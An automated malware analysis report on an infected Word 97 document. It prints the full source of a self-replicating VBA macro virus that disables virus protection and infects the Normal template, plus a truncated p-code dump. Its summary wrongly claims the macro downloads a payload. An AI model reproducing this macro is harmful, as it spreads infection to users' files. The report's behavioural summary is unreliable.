Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1319dc90b65fe828…

MALICIOUS

Office (OLE)

28.5 KB Created: 1999-08-29 06:35:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 15609af90e89b4985ea88d60762d5371 SHA-1: 172c1321bc7ed4a4494cef87124bf01f38be5127 SHA-256: 1319dc90b65fe82878d08f338862ad1e171a099ad08a18dff918a7457de0f680
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word document with a high-confidence detection for VBA macros and a critical ClamAV detection. The embedded VBA macro, named 'macros.bas', is obfuscated and attempts to execute code upon document opening. The script's intent appears to be downloading and executing a second-stage payload, though the exact mechanism is obscured by the obfuscation.

Heuristics 3

  • ClamAV: Doc.Trojan.Liar-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Liar-5
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7991 bytes
SHA-256: 896a202a7b21de8f1ff801ed1049a9ef75df8ccf93f3eb78f3bf99ccbbdaa208
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_open() '
Dim v(150): Options.VirusProtection = (Rnd * 0) '
SetAttr NormalTemplate.FullName, vbNormal '
Set a = MacroContainer.VBProject: Set ab = a.VBComponents(1) '
Set abc = ab.CodeModule: Set s = NormalTemplate: t = Chr(39) '
Set nh = s.VBProject.VBComponents(1).CodeModule '
For y = 1 To Int(75 - (Rnd * 20)): vx = vx & Chr(255 - Int(Rnd * 100)): Next y '
vc = "Private Sub document_close()" & t & vx & vbCr  '
If MacroContainer = NormalTemplate Then '
Set s = ActiveDocument: Set nh = s.VBProject.VBComponents(1).CodeModule '
vc = "Private Sub document_open()" & t & vx & vbCr '
End If: lin = abc.countoflines '
For i = 2 To lin '
jc = "": d = Int(Rnd * 3): p = InStr(abc.Lines(i, 1), t) '
If p = 0 Then GoTo e_ '
If p = 1 And lin > 100 Then '
d = 1: GoTo n_ '
End If '
l = UCase(Left(abc.Lines(i, 1), (p - 1))) '
For o = 1 To Len(l) '
f = Mid(l, o, 1) '
If Asc(f) < 90 And Asc(f) > 65 Then f = Chr(Asc(f) + Int(Rnd * 2) * 32) '
v(i) = v(i) & f '
Next o '
For j = 1 To Int(75 - (Rnd * 20))  '
jc = jc & Chr(255 - Int(Rnd * 100)) '
Next j '
v(i) = v(i) & t & jc '
If d = 2 Then v(i) = v(i) & vbCr & t & jc '
vc = vc & v(i) & vbCr '
n_: '
Next i '
e_: '
If nh.countoflines < (1 + 1) Then '
nh.addfromstring vc: s.Save '
End If '
If Day(Now()) = (25 + Int(Rnd * 6)) Then Selection.InsertAfter "l0 julie, wassup?" '
End Sub '
Rem Class97Macro.julie - dedicated to julie ;) '
Rem Another virus by jack twoflower [LineZero & Metaphase] '

' Processing file: /opt/analyzer/scan_staging/cae8c65388474ed9be298f43513fd49f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3979 bytes
' Line #0:
' 	FuncDefn (Private Sub document_open())
' 	QuoteRem 0x001C 0x0000 ""
' Line #1:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0096 
' 	VarDefn v
' 	BoS 0x0000 
' 	Ld Rnd 
' 	LitDI2 0x0000 
' 	Mul 
' 	Paren 
' 	Ld Options 
' 	MemSt VirusProtection 
' 	QuoteRem 0x0030 0x0000 ""
' Line #2:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	Ld vbNormal 
' 	ArgsCall SetAttr 0x0002 
' 	QuoteRem 0x002A 0x0000 ""
' Line #3:
' 	SetStmt 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	Set a 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld a 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set ab 
' 	QuoteRem 0x003D 0x0000 ""
' Line #4:
' 	SetStmt 
' 	Ld ab 
' 	MemLd CodeModule 
' 	Set abc 
' 	BoS 0x0000 
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set s 
' 	BoS 0x0000 
' 	LitDI2 0x0027 
' 	ArgsLd Chr 0x0001 
' 	St t 
' 	QuoteRem 0x003D 0x0000 ""
' Line #5:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld s 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set nh 
' 	QuoteRem 0x0030 0x0000 ""
' Line #6:
' 	StartForVariable 
' 	Ld y 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x004B 
' 	Ld Rnd 
' 	LitDI2 0x0014 
' 	Mul 
' 	Paren 
' 	Sub 
' 	FnInt 
' 	For 
' 	BoS 0x0000 
' 	Ld vx 
' 	LitDI2 0x00FF 
' 	Ld Rnd 
' 	LitDI2 0x0064 
' 	Mul 
' 	FnInt 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St vx 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld y 
' 	EndForVariable 
' 	NextVar 
' 	QuoteRem 0x004F 0x0000 ""
' Line #7:
' 	LitStr 0x001C "Private Sub document_close()"
' 	Ld t 
' 	Concat 
' 	Ld vx 
' 	Concat 
' 	Ld vbCr 
' 	Concat 
' 	St vc 
' 	QuoteRem 0x0035 0x0000 ""
' Line #8:
' 	Ld MacroContainer 
' 	Ld NormalTemplate 
' 	Eq 
' 	IfBlock 
' 	QuoteRem 0x0028 0x0000 ""
' Line #9:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set s 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld s 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set nh 
' 	QuoteRem 0x0048 0x0000 ""
' Line #10:
' 	LitStr 0x001B "Private Sub document_open()"
' 	Ld t 
' 	Concat 
' 	Ld vx 
' 	Concat 
' 	Ld vbCr 
' 	Concat 
' 	St vc 
' 	QuoteRem 0x0033 0x0000 ""
' Line #11:
' 	EndIfBlock 
' 	BoS 0x0000 
' 	Ld abc 
' 	MemLd countoflin
... (truncated)